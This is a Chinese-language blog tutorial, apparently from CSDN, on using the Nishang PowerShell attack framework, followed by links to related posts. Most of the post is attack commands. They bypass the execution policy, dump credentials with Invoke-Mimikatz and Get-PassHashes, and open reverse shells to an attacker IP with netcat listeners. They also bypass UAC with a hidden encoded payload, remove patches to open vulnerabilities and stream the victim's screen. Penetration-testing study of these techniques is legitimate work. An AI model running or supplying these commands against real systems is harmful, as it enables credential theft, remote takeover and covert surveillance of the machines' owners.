Nishang powershell框架——使用教程

最新推荐文章于 2024-07-13 16:09:04 发布
最新推荐文章于 2024-07-13 16:09:04 发布
阅读量2.1k 收藏 17
点赞数 2
分类专栏: # 好用工具合集
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40412037/article/details/115510209
版权

项目下载地址:https://github.com/samratashok/nishang

一、nishang的简单介绍

Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载荷的一个集合。

nishang下载后的目录列表如下图所示,每个目录对应一个功能模块
在这里插入图片描述

二、nishang的简单使用

首先打开powershell
在这里插入图片描述

导入模块 nishang
必须导入nishang模块,才可以使用这个工具

Import-Module .\nishang.psm1

在这里插入图片描述
初次导入,会有红色字的警告提示,如上图所示,是因为windows官方做的一个安全策略导致

**解决方法:**把执行策略修改一下即可,执行完命令之后按默认选项回车即可

Set-ExecutionPolicy RemoteSigned

在这里插入图片描述
再次导入模块 nishang,没有宏色警告了,下图中黄色的警告不用管
在这里插入图片描述
**查看nishang模块的所有功能:
Get-Command -Module nishang 得到的命令来自nishang模块
在这里插入图片描述
比如:
Check-VN:检测是否是虚拟机版本
Get-Information:获取常规计算机信息
在这里插入图片描述

端口扫描

扫描192.168.184.125-192.168.184.130所有存活主机,以及存活主机开放的端口

Invoke-PortScan -StartAddress 192.168.184.125 -EndAddress 192.168.184.130 -ResolveHost -ScanPort

在这里插入图片描述

获取计算机密码

加载mimikatz获取计算机密码

Invoke-Mimikatz

在这里插入图片描述
如果是简单密码可以直接显示出来,复杂密码显示hash值
在这里插入图片描述
注意:
如果报错提示:win10 ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory

需要win10以管理员身份运行powershell即可解决该问题

获取计算机密码hash值

获取账号密码的hash值

Get-PassHashes

在这里插入图片描述

反弹shell

Invoke-PowershellTcp -Reverse -IPAddress x.x.x.x -Port xxxx
nc -lvvp xxxx
反弹tcp协议

Invoke-Powershelludp -Reverse -IPAddress x.x.x.x -port xxxx
nc -lup xxxx
反弹udp协议

Invoke-PoshRatHttp -IPAddress x.x.x.x -Port xxxx
反弹http协议

Invoke-PoshRatHttps -IPAddress x.x.x.x -Port xxxx
反弹https协议

加入你已经poweshell控制了对方电脑,需要把会话反弹
首先打开kali监听端口1111

nc -nvlp 1111

在这里插入图片描述
反弹shell到192.168.184.145的1111端口

Invoke-PowerShellTcp -Reverse -IPAddress 192.168.184.145 -Port 1111

在这里插入图片描述
执行命令后,成功反弹shell如下图所示
在这里插入图片描述

BypassUAC提权

假设已经将nishang下载到受害主机接下来需要进行UAC提权

使用sysprep方法和默认的Payload执行

Invoke-PsUACme -Verbose

打开受害者主机的powershell,执行命令:Invoke-PsUACme,执行成功后会弹窗一个窗口,
窗口是超级管理员权限,可以添加账号
在这里插入图片描述

//使用oobe方法和默认的Payload执行
Invoke-PsUACme -method oobe -Verbose
//使用-Payload参数可以自行指定要执行的Payload
Invoke-PsUACme -method oobe -Payload "powershell -windowstyle hidden -e YourEncodedPayload"

删除补丁

Remove-Update KB4534132

比如删除KB2534111补丁包,如下图所示。
删除补丁包之后服务器会出现漏洞,可根据漏洞进行利用
在这里插入图片描述

屏幕监控

靶机:Show-TargetScreen -Reverse -IPAddress x.x.x.x -Port xxxx
攻击机:netcat -nlvp xxxx | netcat -nlvp yyyy
URL访间攻击机 IP: yyyy

比如在靶机上执行命令:

Show-TargetScreen -Reverse -IPAddress 192.168.184.145 -Port 1111

在这里插入图片描述
在kali上执行监听命令,并且将监听到的1111端口的数据转发到9999端口上去
在这里插入图片描述
在kali浏览器上输入:127.0.0.1:9999 可以实时监控靶机电脑屏幕
在这里插入图片描述

除了以上示例之外,还可以及逆行弱口令爆破、内网嗅探、中间人攻击等

参考链接:
https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

更多web安全工具、存在漏洞的网站搭建源码、渗透测试思路,收集整理在知识星球。
在这里插入图片描述

W小哥1
关注
专栏目录
PowerShell渗透工具Nishang的用法
谢公子的博客
01-14 3155
目录 Nishang Nishang的目录结构 Nishang的使用 Invoke-Decode.ps1 Nishang Nishang是一个PowerShell脚本和有效载荷的框架和集合,它使PowerShell能够用于攻击安全性、渗透测试和红队。它是基于PowerShell的渗透测试专用工具,集成了框架、脚本和各种Payload,包括下载和执行、键盘记录、DNS、延时命令等脚本...
PowerShell监控——监控电脑屏幕操作记录
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
03-01 1983
目录 监控电脑屏幕? 实现思路 1、通过windows脚本,一定时间间隔进行屏幕抓拍 2、脚本通过powershell语言实现 3、powershell为windows系统自带语言,可以无缝嵌入运行 4、所有抓拍的屏幕照片,按照时间排序,可以实现比较完整的用户操作监控。 PowerShell简介 如何使用PowerShell 监控屏幕脚本实现 监控电脑屏幕? 如何实现对电脑屏幕及其操作的监控? 对于屏幕的监控,一般都是针对windows操作系统 因为对于大部分Linux系统,都是无
nishang使用
weixin_48776804的博客
07-24 437
nishang使用
值班惊魂!曲折“入侵”事件曝光:Windows 机器本地保存RDP密码破解
最新发布
07-13 694
这个故事不仅是一次关于值班的小插曲,更是对网络安全、系统管理以及应急处理的一次深刻反思。这个故事又给你带来了哪些关于日常工作中的安全隐患和应对措施的启示?希望它能引发你的深入思考,并提醒我们在日常工作中时刻保持警惕,防范潜在的风险。
Final——Nishang
weixin_33928467的博客
06-23 298
一、介绍 Nishang是基于PowerShell的渗透测试专用工具,它集成了框架、脚本和各种payload,被广泛应用于渗透测试的各个阶段。 二、使用 下载脚本工具:Nishang Nishang需要我们的Powershell版本在v3以上才能使用。 查看当前Powershell版本:get-host 进入相应目录下 导入框架:Import-Module .\nishang.psm1...
nishang的介绍与使用
weixin_30315723的博客
04-20 437
0x01前言 Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载荷的一个集合。Nishang被广泛应用于渗透测试的各个阶段,本文主要介绍如何使用Nishang的各种姿势获取一个shell。 项目地址 :https://github.com/samratashok/nishang 0x02 Powershell交互式Shel...
Nishang 基础知识
weixin_46104215的博客
11-22 3388
Nishang 是一款针对 PowerShell 的渗透工具。它基于 PowerShell 的渗透测试专用工具,集成了框架、脚本和各种payload,包括了下载和执行、键盘记录、DNS、延时命令等脚本,被广泛应用于渗透测试的各个阶段 https://github.com/samratashok/nishang //下载地址 Nishang 要在 PowerShell3.0以上的环境中才可以正常使用,也就是在 Windows7默认下是有点小问题的,因为它自带的环境时...
PowerShell打印服务器打印任务状态监控_打印出错自动邮件报警
08-06
使用PowerShell脚本自动监控服务器或者电脑上的所有打印机驱动,如果有Error的任务卡在驱动中导致后续的打印任务全部卡在上面,脚本会执行一个邮件通知 邮件通知内容: - 打印机名 - Error状态的打印机任务名 - ...
nishang脚本的使用
qq_63501912的博客
02-06 1486
nishang脚本的常规用法
NishangPowershell 隐藏通信隧道、WebShell 后门
weixin_46104215的博客
11-24 2483
一、Powershell 隐藏通信隧道 1.基于TCP协议的 Powershell 交互式 Shell Invoke-PowerShellTcp 是基于TCP协议的 Powershell 正向连接或反向连接 shell IPAddress <String> //选择 -Reverse 选项时表示需要连接 ip 地址 Port <int32> //选择 -Reverse 选项时表示需要连接的端口,选择 -Bind 选项时表示需要监听的端口 Reverse /
nishang, Nishang PowerShell测试和攻击性安全.zip
09-18
nishang, Nishang PowerShell测试和攻击性安全 Nishang是一个框架和脚本,它允许使用PowerShell安全性。穿透测试和红色组合的脚本。 在渗透测试的所有阶段,Nishang都是有用的。按 nikhil_mitt用法导入当前PowerShell会话( PowerShel
NiShang.7z
09-05
服装商城项目,java开发,技术servlet+jsp;数据库文件请私聊
细说——Nishang
LainWith的博客
09-27 816
介绍 Powershell用于渗透测试其实早在多年前就已经被提出了,利用Powershell,攻击者可以在无需接触磁盘的情况下执行命令等,并且相较已经被大家广泛关注并防御的cmd而言,Powershell并非那么的引人瞩目。Nishang是基于PowerShell的渗透测试专用工具。它集成了框架、脚本和各种payload,能够帮助渗透测试人员在对Windows目标的全过程检测中使用,项目地址:https://github.com/samratashok/nishang ​ 【基于隐私,以及实验效果,我会在虚
基础篇:内网工具Nishang PowerShell
qq_60115503的博客
04-12 1883
Nishang介绍 Nishang是一个PowerShell攻击框架,它是Powershell攻击脚本和有效载荷的一个集合,Nishang被广泛应用于渗透测试的各个阶段
PowerShell渗透工具Nishang
weixin_44110913的博客
08-02 546
目录 Nishang Nishang的目录结构 Nishang的使用 Invoke-Decode.ps1 Nishang Nishang是一个PowerShell脚本和有效载荷的框架和集合,它使PowerShell能够用于攻击安全性、渗透测试和红队。它是基于PowerShell的渗透测试专用工具,集成了框架、脚本和各种Payload,包括下载和执行、键盘记录、DNS、延时命令等脚本,被广泛用于渗透测试的各个阶段。Ni...
Powershell 渗透测试工具-Nishang
weixin_33713503的博客
11-09 471
Powershell 渗透测试工具-Nishang 分享到: 作者:V1ct0r 稿费:500RMB(不服你也来投稿啊!) 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 传送门 【技术分享】Powershell 渗透测试工具-Nishang(一) 0x00 介绍 Powershell用于渗透测试其实早...
Powershell---Nishang工具简介
weixin_43679009的博客
12-01 1399
PowershellNishang工具简介 Nishang简介及安装 Nishang是一款针对Powershell的渗透工具。他基于Powershell的渗透测试专用工具,集成了框架、脚本和各种Payload,包括了下载和执行、键盘记录、DNS、延时命令等脚本,被广泛应用于渗透测试是的各个阶段。 Nishang的安装 下载地址 Nishang要在Powershell 3.0以上的环境中才可以正常使用,也就是说在Windows7下默认是有点小问题的,因为win7下自带的环境是PowerSh
powershell攻击指南——Nishang
willow_liang的博客
12-08 834
1.简介 Nishang是一款针 对PowerShell的渗透工具。它基于PowerShell的渗透测试专用工具,集成了框架、脚本和各种Payload,包括了下载和执行、键盘记录、DNS、延时命令等脚本,被广泛应用于渗透测试的各个阶段。其下载地址为https://github.com/samratashok/nishangNishang要在powershell3.0以上的环境中才可以正常使用。 2.模块导入 Get-Command -Moudle nishang Nishang模块.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值